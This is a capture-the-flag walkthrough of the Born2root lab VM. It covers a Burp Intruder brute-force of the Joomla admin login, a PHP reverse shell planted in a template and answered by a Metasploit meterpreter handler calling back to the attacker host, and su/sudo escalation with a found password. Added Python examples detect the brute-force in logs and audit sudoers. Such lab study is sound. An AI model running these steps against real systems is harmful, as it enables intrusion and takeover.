I decided to solve this box, although it’s not really new. The creator of this box didn’t give a proper description, but I suppose the goal is to get root and acquire the flag. I think the difficulty of the box is between beginner and intermediate level.
I started with the usual nmap scan. Here is the output of the scan:
root :: ~ » nmap -A -p- 192.168.1.148
Nmap scan report for born2root (192.168.1.148)
Host is up (0.00082s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Welcome to my website
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4     111/tcp     rpcbind
|   100000  2,3,4     111/udp     rpcbind
|   100024  1         41869/udp   status
|_  100024  1         59562/tcp   status
59562/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I started exploring the web server further with gobuster. It turned out there is a Joomla installation under the
It looked interesting and I scanned it with a few tools, started searching for exploits etc., but no luck. I had a feeling that this must be the way in, so I fired up cewl to generate a custom wordlist based on the site. Maybe I would be successful with a brute-force attack on the administrator page.
root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://192.168.1.148/joomla
CeWL 5.4.5 (Exclusion) Robin Wood (email@example.com) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
787 passwords.txt
Well, the script generated 787 possible passwords, which was good enough for me. I navigated to the administrator page, enabled the Burp proxy and started Burp Suite.
I captured the login request and sent it to the Intruder. I cleared the auto-selected payload positions except for the password position.
Then I loaded the previously created wordlist as a simple list and started the attack.
It took a couple of minutes, but it was worth it. I sorted the results by status code, so I could easily see the 200 HTTP responses. I chose one and I was able to successfully log in.
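From the defender's side this attack is loud: hundreds of POSTs to the administrator login from one address within a couple of minutes show up in the Apache access log. The detection below is an added example and not code from the original post; it assumes the login endpoint is /joomla/administrator/index.php (the post only shows that Joomla lives under /joomla) and runs over constructed log lines.

```python
"""Spot a wordlist attack on the Joomla administrator login in Apache
combined-format access logs. Added example, not from the original post.
Assumes LOGIN_PATH below; constructed_log() builds constructed sample lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/joomla/administrator/index.php"   # assumed login endpoint
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

def parse_line(line):
    """Return the fields we need from one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "method": m.group("method"),
            "path": m.group("path").split("?", 1)[0],   # drop query string
            "status": int(m.group("status"))}

def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Map source IP -> total login POSTs for every IP that sent at least
    `threshold` POSTs to LOGIN_PATH inside some sliding `window`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            posts[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # shrink the window from the left
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = len(stamps)
                break
    return hits

def constructed_log():
    """Constructed sample: one admin logging in normally, one host firing
    25 login POSTs in 25 seconds, which is what an Intruder run looks like."""
    tz = timezone(timedelta(hours=2))
    def line(ip, t, method, status):
        return '{} - - [{}] "{} {} HTTP/1.1" {} 512'.format(
            ip, t.strftime("%d/%b/%Y:%H:%M:%S %z"), method, LOGIN_PATH, status)
    t0 = datetime(2019, 5, 28, 14, 55, 0, tzinfo=tz)
    lines = [line("10.0.0.5", t0, "GET", 200),
             line("10.0.0.5", t0 + timedelta(seconds=8), "POST", 303)]
    lines += [line("192.168.1.117", t0 + timedelta(seconds=30 + i), "POST", 200)
              for i in range(25)]
    return lines
```

Tune `threshold` and `window` to the real login rate of the site; a legitimate admin rarely exceeds a handful of POSTs per minute.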
My first thought was to upload a reverse shell, which is pretty easy at this point. I clicked on the Templates menu and selected the default Protostar template. You can upload any kind of file, but I uploaded my PHP reverse shell and executed it by navigating to:
Before doing that I set up my handler using Metasploit. After I got a connection back, I started poking around and looking for privilege escalation vectors.
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.117
lhost => 192.168.1.117
msf5 exploit(multi/handler) > set lport 9898
lport => 9898
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.117:9898
[*] Sending stage (38247 bytes) to 192.168.1.148
[*] Meterpreter session 1 opened (192.168.1.117:9898 -> 192.168.1.148:50447) at 2019-05-28 15:01:24 +0200
meterpreter > sysinfo
Computer     : born2root
OS           : Linux born2root 3.16.0-6-586 #1 Debian 3.16.56-1 (2018-04-28) i686
Meterpreter  : php/linux
In the /opt folder, I found an interesting Python script, which contained a password. I upgraded my shell with Python so that I could switch user and use this password to log in as tim. By the way, he used the same password for SSH access, and it is easier to work with a fully functional shell, but here I worked my way through with the simple netcat reverse shell.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@born2root:/var/www/html/joomla/templates/protostar$ su tim
Password: lulzlol
tim@born2root:/var/www/html/joomla/templates/protostar$ sudo -l
[sudo] password for tim: lulzlol
Matching Defaults entries for tim on born2root:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tim may run the following commands on born2root:
    (ALL : ALL) ALL
As you can see, tim can run everything as root without needing the root password. Let's switch to root!
tim@born2root:/var/www/html/joomla/templates/protostar$ sudo su
root@born2root:/var/www/html/joomla/templates/protostar# cd /root
root@born2root:~# ls
flag.txt
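The `(ALL : ALL) ALL` rule is the whole privilege escalation here, and it is the kind of thing a periodic sudoers audit catches before an attacker does. The check below is an added example, not part of the original post or the VM; the sudoers text is constructed, and only the tim rule mirrors what `sudo -l` printed above.

```python
"""Flag sudoers user specs that let a named non-root account run ALL
commands as root. Added example for this write-up; CONSTRUCTED_SUDOERS is
constructed sample input, with the tim rule copied from the sudo -l output."""
import re

# user  host = (runas_user : runas_group) TAG: cmd1, cmd2
SPEC_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*'
                     r'(?:\((?P<runas>[^)]*)\)\s*)?'      # optional (user : group)
                     r'(?P<tags>(?:[A-Z]+:\s*)*)'         # optional NOPASSWD: etc.
                     r'(?P<cmds>.+)$')
ALIAS_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

CONSTRUCTED_SUDOERS = """\
Defaults        env_reset, mail_badpass
# full root for the admin group is expected and reviewed separately
%sudo   ALL=(ALL:ALL) ALL
root    ALL=(ALL:ALL) ALL
tim     ALL=(ALL : ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
deploy  ALL=(www-data) /usr/bin/php
"""

def audit_sudoers(text):
    """Return (user, rule) pairs for named non-root users who may run ALL
    commands as root or as ALL (which includes root)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments
        if not line or line.startswith(ALIAS_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        if user == "root" or user.startswith("%"):   # groups need their own review
            continue
        # a missing (runas) spec means "as root"
        runas_user = (m.group("runas") or "root").split(":")[0].strip()
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        if runas_user in ("root", "ALL") and "ALL" in cmds:
            findings.append((user, line))
    return findings

if __name__ == "__main__":
    for user, rule in audit_sudoers(CONSTRUCTED_SUDOERS):
        print("unrestricted root for %s: %s" % (user, rule))
```

Rules scoped to a runas user other than root, or to an explicit command list like the backup entry, pass the check; the fix for tim is to replace `ALL` with the specific commands the account actually needs.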
Finally, I printed out the one and only flag in the
root@born2root:~# cat flag.txt
.andAHHAbnn. .aAHHHAAUUAAHHHAn. dHP^~" "~^THb. . .AHF YHA. . | .AHHb. .dHHA. | | HHAUAAHAbn adAHAAUAHA | I HF~"_____ ____ ]HHH I HHI HAPK""~^YUHb dAHHHHHHHHHH IHH HHI HHHD> .andHH HHUUP^~YHHHH IHH YUI ]HHP "~Y P~" THH[ IUP " `HK ]HH' " THAn. .d.aAAn.b. .dHHP ]HHHHAAUP" ~~ "YUAAHHHH[ `HHP^~" .annn. "~^YHH' YHb ~" "" "~ dHF "YAb..abdHHbndbndAP" THHAAb. .adAHHF "UHHHHHHHHHHU" ]HHUUHHHHHH[ .adHHb "HHHHHbn. ..andAAHHHHHHb.AHHHHHHHAAbnn.. .ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn. "~^YUHHP" "~^YUHHUP" "^YUP^" "" "~~"
W00t w00t ! If you are reading this text then Congratulations !!
I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .
If you want to try more boxes like this created by me, try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)
root@born2root:~#